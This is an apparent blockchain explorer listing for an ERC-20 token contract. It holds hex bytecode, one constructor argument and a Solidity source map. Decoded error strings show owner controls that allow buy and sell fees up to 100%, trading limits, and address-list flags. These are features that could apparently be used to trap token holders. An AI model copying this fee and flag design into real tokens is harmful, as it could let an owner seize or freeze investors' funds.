6040613aff8682870161384e565b9150509250925092565b6000606082019050613b1e60008301866137a8565b613b2b60208301856138c3565b613b3860408301846138c3565b949350505050565b613b49816136e8565b82525050565b6000602082019050613b646000830184613b40565b92915050565b60008060408385031215613b8157613b806136be565b5b6000613b8f85828601613711565b9250506020613ba08582860161384e565b9150509250929050565b600080600060608486031215613bc357613bc26136be565b5b6000613bd18682870161384e565b9350506020613be286828701613747565b9250506040613bf386828701613747565b9150509250925092565b60008060408385031215613c1457613c136136be565b5b6000613c2285828601613711565b9250506020613c3385828601613711565b9150509250929050565b6000606082019050613c5260008301866137a8565b613c5f60208301856137a8565b613c6c60408301846137a8565b949350505050565b600060c082019050613c8960008301896138c3565b613c9660208301886138c3565b613ca360408301876138c3565b613cb060608301866138c3565b613cbd60808301856138c3565b613cca60a08301846138c3565b979650505050505050565b6000604082019050613cea6000830185613b40565b613cf76020830184613b40565b9392505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b60006002820490506001821680613d4557607f821691505b602082108103613d5857613d57613cfe565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000613dc782613726565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203613df957613df8613d8d565b5b600182019050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206160008201527f6c6c6f77616e6365000000000000000000000000000000000000000000000000602082015250565b6000613e60602883613617565b9150613e6b82613e04565b604082019050919050565b60006020820190508181036000830152613e8f81613e53565b9050919050565b6000613ea182613726565b9150613eac83613726565b9250828201905080821115613ec457613ec3613d8d565b5b92915050565b7f43616e6e6f7420736574206d617857616c6c6574206c6f776572207468616e2060008201527f302e352500000000000000000000000000000000000000000000000000000000602082015250565b6000613f26602483613617565b9150613f3182613eca565b604082019050919050565b60006020820190508181036000830152613f5581613f19565b9050919050565b6000613f6782613726565b9150613f7283613726565b9250828202613f8081613726565b91508282048414831517613f9757613f96613d8d565b5b5092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601260045260246000fd5b6000613fd882613726565b9150613fe383613726565b925082613ff357613ff2613f9e565b5b828204905092915050565b7f546f74616c20627579206665652063616e6e6f7420626520686967686572207460008201527f68616e2031303025000000000000000000000000000000000000000000000000602082015250565b600061405a602883613617565b915061406582613ffe565b604082019050919050565b600060208201905081810360008301526140898161404d565b9050919050565b60006060820190506140a560008301866138c3565b6140b260208301856138c3565b6140bf60408301846138c3565b949350505050565b7f43616e6e6f7420736574206d61785478206c6f776572207468616e20302e3225600082015250565b60006140fd602083613617565b9150614108826140c7565b602082019050919050565b6000602082019050818103600083015261412c816140f0565b9050919050565b7f63616e6e6f7420736574206275796261636b206d6f7265206f6674656e20746860008201527f616e206576657279203130206d696e7574657300000000000000000000000000602082015250565b600061418f603383613617565b915061419a82614133565b604082019050919050565b600060208201905081810360008301526141be81614182565b9050919050565b7f4d75737420736574206175746f204c50206275726e2070657263656e7420626560008201527f747765656e20302520616e642031302500000000000000000000000000000000602082015250565b6000614221603083613617565b915061422c826141c5565b604082019050919050565b6000602082019050818103600083015261425081614214565b9050919050565b7f54686520706169722063616e6e6f742062652072656d6f7665642066726f6d2060008201527f6175746f6d617465644d61726b65744d616b6572506169727300000000000000602082015250565b60006142b3603983613617565b91506142be82614257565b604082019050919050565b600060208201905081810360008301526142e2816142a6565b9050919050565b7f546f74616c2073656c6c206665652063616e6e6f74206265206869676865722060008201527f7468616e20313030250000000000000000000000000000000000000000000000602082015250565b6000614345602983613617565b9150614350826142e9565b604082019050919050565b6000602082019050818103600083015261437481614338565b9050919050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b60006143d7602583613617565b91506143e28261437b565b604082019050919050565b60006020820190508181036000830152614406816143ca565b9050919050565b7f5377617020616d6f756e742063616e6e6f74206265206c6f776572207468616e60008201527f20302e30312520746f74616c20737570706c792e000000000000000000000000602082015250565b6000614469603483613617565b91506144748261440d565b604082019050919050565b600060208201905081810360008301526144988161445c565b9050919050565b7f6d6178696d756d20616d6f756e742063616e742062652068696768657220746860008201527f616e206d696e696d756d00000000000000000000000000000000000000000000602082015250565b60006144fb602a83613617565b91506145068261449f565b604082019050919050565b6000602082019050818103600083015261452a816144ee565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b600061458d602683613617565b915061459882614531565b604082019050919050565b600060208201905081810360008301526145bc81614580565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b600061461f602483613617565b915061462a826145c3565b604082019050919050565b6000602082019050818103600083015261464e81614612565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b60006146b1602283613617565b91506146bc82614655565b604082019050919050565b600060208201905081810360008301526146e0816146a4565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b600061471d602083613617565b9150614728826146e7565b602082019050919050565b6000602082019050818103600083015261474c81614710565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b60006147af602583613617565b91506147ba82614753565b604082019050919050565b600060208201905081810360008301526147de816147a2565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b6000614841602383613617565b915061484c826147e5565b604082019050919050565b6000602082019050818103600083015261487081614834565b9050919050565b7f5f7472616e736665723a3a2054726164696e67206973206e6f7420616374697660008201527f652e000000000000000000000000000000000000000000000000000000000000602082015250565b60006148d3602283613617565b91506148de82614877565b604082019050919050565b60006020820190508181036000830152614902816148c6565b9050919050565b7f5f7472616e736665723a3a205472616e736665722044656c617920656e61626c60008201527f65642e20204f6e6c79206f6e652070757263686173652070657220626c6f636b60208201527f20616c6c6f7765642e0000000000000000000000000000000000000000000000604082015250565b600061498b604983613617565b915061499682614909565b606082019050919050565b600060208201905081810360008301526149ba8161497e565b9050919050565b7f427579207472616e7366657220616d6f756e742065786365656473207468652060008201527f6d617854782e0000000000000000000000000000000000000000000000000000602082015250565b6000614a1d602683613617565b9150614a28826149c1565b604082019050919050565b60006020820190508181036000830152614a4c81614a10565b9050919050565b7f4d61782077616c6c657420657863656564656400000000000000000000000000600082015250565b6000614a89601383613617565b9150614a9482614a53565b602082019050919050565b60006020820190508181036000830152614ab881614a7c565b9050919050565b7f53656c6c207472616e7366657220616d6f756e7420657863656564732074686560008201527f206d617854782e00000000000000000000000000000000000000000000000000602082015250565b6000614b1b602783613617565b9150614b2682614abf565b604082019050919050565b60006020820190508181036000830152614b4a81614b0e565b9050919050565b6000614b5c82613726565b9150614b6783613726565b9250828203905081811115614b7f57614b7e613d8d565b5b92915050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000614be1602683613617565b9150614bec82614b85565b604082019050919050565b60006020820190508181036000830152614c1081614bd4565b9050919050565b600081905092915050565b50565b6000614c32600083614c17565b9150614c3d82614c22565b600082019050919050565b6000614c5382614c25565b9150819050919050565b600081519050614c6c81613730565b92915050565b600060208284031215614c8857614c876136be565b5b6000614c9684828501614c5d565b91505092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b600081519050614cdd816136fa565b92915050565b600060208284031215614cf957614cf86136be565b5b6000614d0784828501614cce565b91505092915050565b6000819050919050565b6000819050919050565b6000614d3f614d3a614d3584614d10565b614d1a565b613726565b9050919050565b614d4f81614d24565b82525050565b600081519050919050565b600082825260208201905092915050565b6000819050602082019050919050565b614d8a816136e8565b82525050565b6000614d9c8383614d81565b60208301905092915050565b6000602082019050919050565b6000614dc082614d55565b614dca8185614d60565b9350614dd583614d71565b8060005b83811015614e06578151614ded8882614d90565b9750614df883614da8565b925050600181019050614dd9565b5085935050505092915050565b600060a082019050614e2860008301886138c3565b614e356020830187614d46565b8181036040830152614e478186614db5565b9050614e566060830185613b40565b614e6360808301846138c3565b969550505050505056fea26469706673582212209dc630571cb349e38f3dc7fd9dbf4b78834da7cbbd6b8533c511493eb157d09564736f6c63430008130033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

0000000000000000000000004deb2077ad3051f305ac18a7b823ebdd8d657e93

-----Decoded View---------------
Arg [0] : dev (address): 0x4dEB2077aD3051f305AC18a7B823EBDd8D657E93

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 0000000000000000000000004deb2077ad3051f305ac18a7b823ebdd8d657e93


Deployed Bytecode Sourcemap

157:22900:5:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;874:100:0;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3106:194;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;20869::5;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;1993:108:0;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;483:35:5;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3778:529:0;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;22838:216:5;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;5060:160;;;;;;;;;;;;;:::i;:::-;;525:54;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;912:32;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1836:92:0;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;13570:388:5;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;:::i;:::-;;;;;;;;4712:290:0;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;953:34:5;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8394:236;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;8917:400;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;7508:216;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;2164:143:0;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;969:103:4;;;;;;;;;;;;;:::i;:::-;;6825:447:5;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;12795:355;;;;;;;;;;;;;:::i;:::-;;;;;;;;;:::i;:::-;;;;;;;;739:87:4;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1093:104:0;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11841:173:5;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;10794:300;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;9566:179;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;10034:449;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;5501:475:0;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;586:29:5;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;2520:200:0;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;11480:181:5;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;22747:83;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;6264:553;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;5667:132;;;;;;;;;;;;;:::i;:::-;;2783:176:0;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;14418:448:5;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;;;:::i;:::-;;;;;;;;5360:152;;;;;;;;;;;;;:::i;:::-;;276:22;;;;;;;;;;;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;1217:201:4;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;15350:572:5;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;:::i;:::-;;;;;;;;21071:107;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12246:190;;;;;;;;;;;;;:::i;:::-;;;;;;;;:::i;:::-;;;;;;;;7992:195;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;874:100:0;928:13;961:5;954:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;874:100;:::o;3106:194::-;3214:4;3231:39;3240:12;:10;:12::i;:::-;3254:7;3263:6;3231:8;:39::i;:::-;3288:4;3281:11;;3106:194;;;;:::o;20869::5:-;698:13:4;:11;:13::i;:::-;20959:9:5::1;20954:102;20978:8;;:15;;20974:1;:19;20954:102;;;21041:3;21015:10;:23;21026:8;;21035:1;21026:11;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;21015:23;;;;;;;;;;;;;;;;:29;;;;;;;;;;;;;;;;;;20995:3;;;;;:::i;:::-;;;;20954:102;;;;20869:194:::0;;;:::o;1993:108:0:-;2054:7;2081:12;;2074:19;;1993:108;:::o;483:35:5:-;;;;:::o;3778:529:0:-;3918:4;3935:36;3945:6;3953:9;3964:6;3935:9;:36::i;:::-;3984:24;4011:11;:19;4023:6;4011:19;;;;;;;;;;;;;;;:33;4031:12;:10;:12::i;:::-;4011:33;;;;;;;;;;;;;;;;3984:60;;4097:6;4077:16;:26;;4055:116;;;;;;;;;;;;:::i;:::-;;;;;;;;;4207:57;4216:6;4224:12;:10;:12::i;:::-;4257:6;4238:16;:25;4207:8;:57::i;:::-;4295:4;4288:11;;;3778:529;;;;;:::o;22838:216:5:-;698:13:4;:11;:13::i;:::-;22934:9:5::1;22929:118;22953:10;;:17;;22949:1;:21;22929:118;;;23015:10;;23026:1;23015:13;;;;;;;:::i;:::-;;;;;;;;;;;;;;;:::i;:::-;22997:38;;23006:7;;;;;;;;;;;22997:38;;;23030:4;22997:38;;;;;;:::i;:::-;;;;;;;;22972:3;;;;;:::i;:::-;;;;22929:118;;;;22838:216:::0;;;:::o;5060:160::-;698:13:4;:11;:13::i;:::-;5129:4:5::1;5112:14;;:21;;;;;;;;;;;;;;;;;;5160:5;5144:13;;:21;;;;;;;;;;;;;;;;;;5196:15;5181:31;;;;;;;;;;5060:160::o:0;525:54::-;;;;:::o;912:32::-;;;;;;;;;;;;;:::o;1836:92:0:-;1894:5;1919:1;1912:8;;1836:92;:::o;13570:388:5:-;13657:19;13691:26;13732:18;13765:14;13824:13;;;;;;;;;;;13807:30;;13872:20;;;;;;;;;;;13848:44;;13916:9;;13903:22;;13945:5;;13936:14;;13570:388;;;;:::o;4712:290:0:-;4825:4;4842:130;4865:12;:10;:12::i;:::-;4892:7;4951:10;4914:11;:25;4926:12;:10;:12::i;:::-;4914:25;;;;;;;;;;;;;;;:34;4940:7;4914:34;;;;;;;;;;;;;;;;:47;;;;:::i;:::-;4842:8;:130::i;:::-;4990:4;4983:11;;4712:290;;;;:::o;953:34:5:-;;;;;;;;;;;;;:::o;8394:236::-;698:13:4;:11;:13::i;:::-;8483:1:5::1;8473:6;:11;;8465:60;;;;;;;;;;;;:::i;:::-;;;;;;;;;8575:4;8558:13;:11;:13::i;:::-;8549:6;:22;;;;:::i;:::-;8548:31;;;;:::i;:::-;8536:9;:43;;;;8595:27;8612:9;;8595:27;;;;;;:::i;:::-;;;;;;;;8394:236:::0;:::o;8917:400::-;698:13:4;:11;:13::i;:::-;9050::5::1;9032:15;:31;;;;9090:7;9074:13;:23;;;;9140:13;;9122:15;;:31;;;;:::i;:::-;9108:11;:45;;;;9187:3;9172:11;;:18;;9164:71;;;;;;;;;;;;:::i;:::-;;;;;;;;;9251:58;9265:11;;9278:15;;9295:13;;9251:58;;;;;;;;:::i;:::-;;;;;;;;8917:400:::0;;:::o;7508:216::-;698:13:4;:11;:13::i;:::-;7593:1:5::1;7583:6;:11;;7575:56;;;;;;;;;;;;:::i;:::-;;;;;;;;;7677:4;7660:13;:11;:13::i;:::-;7651:6;:22;;;;:::i;:::-;7650:31;;;;:::i;:::-;7642:5;:39;;;;7697:19;7710:5;;7697:19;;;;;;:::i;:::-;;;;;;;;7508:216:::0;:::o;2164:143:0:-;2254:7;2281:9;:18;2291:7;2281:18;;;;;;;;;;;;;;;;2274:25;;2164:143;;;:::o;969:103:4:-;698:13;:11;:13::i;:::-;1034:30:::1;1061:1;1034:18;:30::i;:::-;969:103::o:0;6825:447:5:-;698:13:4;:11;:13::i;:::-;6979:3:5::1;6956:19;:26;;6948:90;;;;;;;;;;;;:::i;:::-;;;;;;;;;7069:4;7057:8;:16;;:33;;;;;7089:1;7077:8;:13;;7057:33;7049:94;;;;;;;;;;;;:::i;:::-;;;;;;;;;7172:19;7154:15;:37;;;;7221:8;7202:16;:27;;;;7256:8;7240:13;;:24;;;;;;;;;;;;;;;;;;6825:447:::0;;;:::o;12795:355::-;12885:21;12921:25;12961;13033:15;;;;;;;;;;;13014:34;;13079:16;;13059:36;;13126:16;;13106:36;;12795:355;;;:::o;739:87:4:-;785:7;812:6;;;;;;;;;;;805:13;;739:87;:::o;1093:104:0:-;1149:13;1182:7;1175:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;1093:104;:::o;11841:173:5:-;698:13:4;:11;:13::i;:::-;11956::5::1;;;;;;;;;;;11924:46;;11945:9;11924:46;;;;;;;;;;;;11997:9;11981:13;;:25;;;;;;;;;;;;;;;;;;11841:173:::0;:::o;10794:300::-;698:13:4;:11;:13::i;:::-;10940:7:5::1;;;;;;;;;;;10932:15;;:4;:15;;::::0;10910:122:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;11045:41;11074:4;11080:5;11045:28;:41::i;:::-;10794:300:::0;;:::o;9566:179::-;698:13:4;:11;:13::i;:::-;9679:8:5::1;9650:17;:26;9668:7;9650:26;;;;;;;;;;;;;;;;:37;;;;;;;;;;;;;;;;;;9719:7;9703:34;;;9728:8;9703:34;;;;;;:::i;:::-;;;;;;;;9566:179:::0;;:::o;10034:449::-;698:13:4;:11;:13::i;:::-;10169::5::1;10150:16;:32;;;;10210:7;10193:14;:24;;;;10262:14;;10243:16;;:33;;;;:::i;:::-;10228:12;:48;;;;10325:3;10309:12;;:19;;10287:110;;;;;;;;;;;;:::i;:::-;;;;;;;;;10413:62;10428:12;;10442:16;;10460:14;;10413:62;;;;;;;;:::i;:::-;;;;;;;;10034:449:::0;;:::o;5501:475:0:-;5619:4;5636:24;5663:11;:25;5675:12;:10;:12::i;:::-;5663:25;;;;;;;;;;;;;;;:34;5689:7;5663:34;;;;;;;;;;;;;;;;5636:61;;5750:15;5730:16;:35;;5708:122;;;;;;;;;;;;:::i;:::-;;;;;;;;;5866:67;5875:12;:10;:12::i;:::-;5889:7;5917:15;5898:16;:34;5866:8;:67::i;:::-;5964:4;5957:11;;;5501:475;;;;:::o;586:29:5:-;;;;:::o;2520:200:0:-;2631:4;2648:42;2658:12;:10;:12::i;:::-;2672:9;2683:6;2648:9;:42::i;:::-;2708:4;2701:11;;2520:200;;;;:::o;11480:181:5:-;698:13:4;:11;:13::i;:::-;11599:15:5::1;;;;;;;;;;;11565:50;;11588:9;11565:50;;;;;;;;;;;;11644:9;11626:15;;:27;;;;;;;;;;;;;;;;;;11480:181:::0;:::o;22747:83::-;698:13:4;:11;:13::i;:::-;22817:5:5::1;22807:7;;:15;;;;;;;;;;;;;;;;;;22747:83:::0;:::o;6264:553::-;698:13:4;:11;:13::i;:::-;6430:1:5::1;6422:4;:9;;6400:111;;;;;;;;;;;;:::i;:::-;;;;;;;;;6538:4;6530;:12;;6522:67;;;;;;;;;;;;:::i;:::-;;;;;;;;;6620:8;6602:15;;:26;;;;;;;;;;;;;;;;;;6683:5;6675:4;6659:13;:11;:13::i;:::-;:20;;;;:::i;:::-;6658:30;;;;:::i;:::-;6639:16;:49;;;;6743:5;6735:4;6719:13;:11;:13::i;:::-;:20;;;;:::i;:::-;6718:30;;;;:::i;:::-;6699:16;:49;;;;6764:45;6788:8;6798:4;6804;6764:45;;;;;;;;:::i;:::-;;;;;;;;6264:553:::0;;;:::o;5667:132::-;698:13:4;:11;:13::i;:::-;5740:5:5::1;5724:13;;:21;;;;;;;;;;;;;;;;;;5775:15;5761:30;;;;;;;;;;5667:132::o:0;2783:176:0:-;2897:7;2924:11;:18;2936:5;2924:18;;;;;;;;;;;;;;;:27;2943:7;2924:27;;;;;;;;;;;;;;;;2917:34;;2783:176;;;;:::o;14418:448:5:-;14538:23;14576:25;14616:31;14696:17;:26;14714:7;14696:26;;;;;;;;;;;;;;;;;;;;;;;;;14675:47;;14756:19;:28;14776:7;14756:28;;;;;;;;;;;;;;;;;;;;;;;;;14733:51;;14824:25;:34;14850:7;14824:34;;;;;;;;;;;;;;;;;;;;;;;;;14795:63;;14418:448;;;;;:::o;5360:152::-;698:13:4;:11;:13::i;:::-;5445:5:5::1;5422:20;;:28;;;;;;;;;;;;;;;;;;5488:15;5466:38;;;;;;;;;;5360:152::o:0;276:22::-;;;;;;;;;;;;;:::o;1217:201:4:-;698:13;:11;:13::i;:::-;1326:1:::1;1306:22;;:8;:22;;::::0;1298:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;1382:28;1401:8;1382:18;:28::i;:::-;1217:201:::0;:::o;15350:572:5:-;15435:20;15470:24;15509:22;15546:21;15582:25;15622:23;15688:11;;15673:26;;15729:15;;15710:34;;15772:13;;15755:30;;15812:12;;15796:28;;15855:16;;15835:36;;15900:14;;15882:32;;15350:572;;;;;;:::o;21071:107::-;21126:4;21149:10;:21;21160:9;21149:21;;;;;;;;;;;;;;;;;;;;;;;;;21142:28;;21071:107;;;:::o;12246:190::-;12323:24;12349:22;12397:15;;;;;;;;;;;12414:13;;;;;;;;;;;12389:39;;;;12246:190;;:::o;7992:195::-;698:13:4;:11;:13::i;:::-;8128:4:5::1;8098:19;:27;8118:6;8098:27;;;;;;;;;;;;;;;;:34;;;;;;;;;;;;;;;;;;8166:6;8148:31;;;8174:4;8148:31;;;;;;:::i;:::-;;;;;;;;7992:195:::0;;:::o;92:98:4:-;145:7;172:10;165:17;;92:98;:::o;9284:380:0:-;9437:1;9420:19;;:5;:19;;;9412:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9518:1;9499:21;;:7;:21;;;9491:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;9602:6;9572:11;:18;9584:5;9572:18;;;;;;;;;;;;;;;:27;9591:7;9572:27;;;;;;;;;;;;;;;:36;;;;9640:7;9624:32;;9633:5;9624:32;;;9649:6;9624:32;;;;;;:::i;:::-;;;;;;;;9284:380;;;:::o;834:127:4:-;904:12;:10;:12::i;:::-;893:23;;:7;:5;:7::i;:::-;:23;;;885:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;834:127::o;15930:4511:5:-;16078:1;16062:18;;:4;:18;;;16054:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;16155:1;16141:16;;:2;:16;;;16133:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;16224:1;16214:6;:11;16210:93;;16242:28;16258:4;16264:2;16268:1;16242:15;:28::i;:::-;16285:7;;16210:93;16319:13;;;;;;;;;;;16315:2345;;;16379:7;:5;:7::i;:::-;16371:15;;:4;:15;;;;:49;;;;;16413:7;:5;:7::i;:::-;16407:13;;:2;:13;;;;16371:49;:86;;;;;16455:1;16441:16;;:2;:16;;;;16371:86;:128;;;;;16492:6;16478:21;;:2;:21;;;;16371:128;:158;;;;;16521:8;;;;;;;;;;;16520:9;16371:158;16349:2300;;;16569:14;;;;;;;;;;;16564:232;;16642:17;:23;16660:4;16642:23;;;;;;;;;;;;;;;;;;;;;;;;;:48;;;;16669:17;:21;16687:2;16669:21;;;;;;;;;;;;;;;;;;;;;;;;;16642:48;16608:168;;;;;;;;;;;;:::i;:::-;;;;;;;;;16564:232;16952:20;;;;;;;;;;;16948:629;;;17033:7;:5;:7::i;:::-;17027:13;;:2;:13;;;;:66;;;;;17083:9;17069:24;;:2;:24;;;;17027:66;:117;;;;;17136:7;;;;;;;;;;;17122:22;;:2;:22;;;;17027:117;16997:561;;;17308:12;17233:28;:39;17262:9;17233:39;;;;;;;;;;;;;;;;:87;17195:258;;;;;;;;;;;;:::i;:::-;;;;;;;;;17522:12;17480:28;:39;17509:9;17480:39;;;;;;;;;;;;;;;:54;;;;16997:561;16948:629;17651:25;:31;17677:4;17651:31;;;;;;;;;;;;;;;;;;;;;;;;;:59;;;;;17687:19;:23;17707:2;17687:23;;;;;;;;;;;;;;;;;;;;;;;;;17686:24;17651:59;17625:1009;;;17797:5;;17787:6;:15;;17753:139;;;;;;;;;;;;:::i;:::-;;;;;;;;;17975:9;;17958:13;17968:2;17958:9;:13::i;:::-;17949:6;:22;;;;:::i;:::-;:35;;17915:140;;;;;;;;;;;;:::i;:::-;;;;;;;;;17625:1009;;;18153:25;:29;18179:2;18153:29;;;;;;;;;;;;;;;;;;;;;;;;;:59;;;;;18187:19;:25;18207:4;18187:25;;;;;;;;;;;;;;;;;;;;;;;;;18186:26;18153:59;18127:507;;;18299:5;;18289:6;:15;;18255:140;;;;;;;;;;;;:::i;:::-;;;;;;;;;18127:507;;;18426:19;:23;18446:2;18426:23;;;;;;;;;;;;;;;;;;;;;;;;;18421:213;;18534:9;;18517:13;18527:2;18517:9;:13::i;:::-;18508:6;:22;;;;:::i;:::-;:35;;18474:140;;;;;;;;;;;;:::i;:::-;;;;;;;;;18421:213;18127:507;17625:1009;16349:2300;16315:2345;18672:28;18703:24;18721:4;18703:9;:24::i;:::-;18672:55;;18740:12;18779:16;;18755:20;:40;;18740:55;;18826:7;:39;;;;;18850:15;;;;;;;;;;;18826:39;:65;;;;;18883:8;;;;;;;;;;;18882:9;18826:65;:114;;;;;18909:25;:31;18935:4;18909:31;;;;;;;;;;;;;;;;;;;;;;;;;18908:32;18826:114;:155;;;;;18958:17;:23;18976:4;18958:23;;;;;;;;;;;;;;;;;;;;;;;;;18957:24;18826:155;:194;;;;;18999:17;:21;19017:2;18999:21;;;;;;;;;;;;;;;;;;;;;;;;;18998:22;18826:194;18808:326;;;19058:4;19047:8;;:15;;;;;;;;;;;;;;;;;;19079:10;:8;:10::i;:::-;19117:5;19106:8;;:16;;;;;;;;;;;;;;;;;;18808:326;19146:12;19162:8;;;;;;;;;;;19161:9;19146:24;;19272:17;:23;19290:4;19272:23;;;;;;;;;;;;;;;;;;;;;;;;;:48;;;;19299:17;:21;19317:2;19299:21;;;;;;;;;;;;;;;;;;;;;;;;;19272:48;19268:96;;;19347:5;19337:15;;19268:96;19376:12;19481:7;19477:815;;;19533:25;:29;19559:2;19533:29;;;;;;;;;;;;;;;;;;;;;;;;;:49;;;;;19581:1;19566:12;;:16;19533:49;19529:614;;;19610:33;19639:3;19610:24;19621:12;;19610:6;:10;;:24;;;;:::i;:::-;:28;;:33;;;;:::i;:::-;19603:40;;19708:12;;19690:14;;19683:4;:21;;;;:::i;:::-;19682:38;;;;:::i;:::-;19662:16;;:58;;;;;;;:::i;:::-;;;;;;;;19789:12;;19769:16;;19762:4;:23;;;;:::i;:::-;19761:40;;;;:::i;:::-;19739:18;;:62;;;;;;;:::i;:::-;;;;;;;;19529:614;;;19863:25;:31;19889:4;19863:31;;;;;;;;;;;;;;;;;;;;;;;;;:50;;;;;19912:1;19898:11;;:15;19863:50;19859:284;;;19941:32;19969:3;19941:23;19952:11;;19941:6;:10;;:23;;;;:::i;:::-;:27;;:32;;;;:::i;:::-;19934:39;;20037:11;;20020:13;;20013:4;:20;;;;:::i;:::-;20012:36;;;;:::i;:::-;19992:16;;:56;;;;;;;:::i;:::-;;;;;;;;20116:11;;20097:15;;20090:4;:22;;;;:::i;:::-;20089:38;;;;:::i;:::-;20067:18;;:60;;;;;;;:::i;:::-;;;;;;;;19859:284;19529:614;20170:1;20163:4;:8;20159:91;;;20192:42;20208:4;20222;20229;20192:15;:42::i;:::-;20159:91;20276:4;20266:14;;;;;:::i;:::-;;;19477:815;20308:8;;;;;;;;;;;20307:9;:26;;;;;20320:13;;;;;;;;;;;20307:26;2030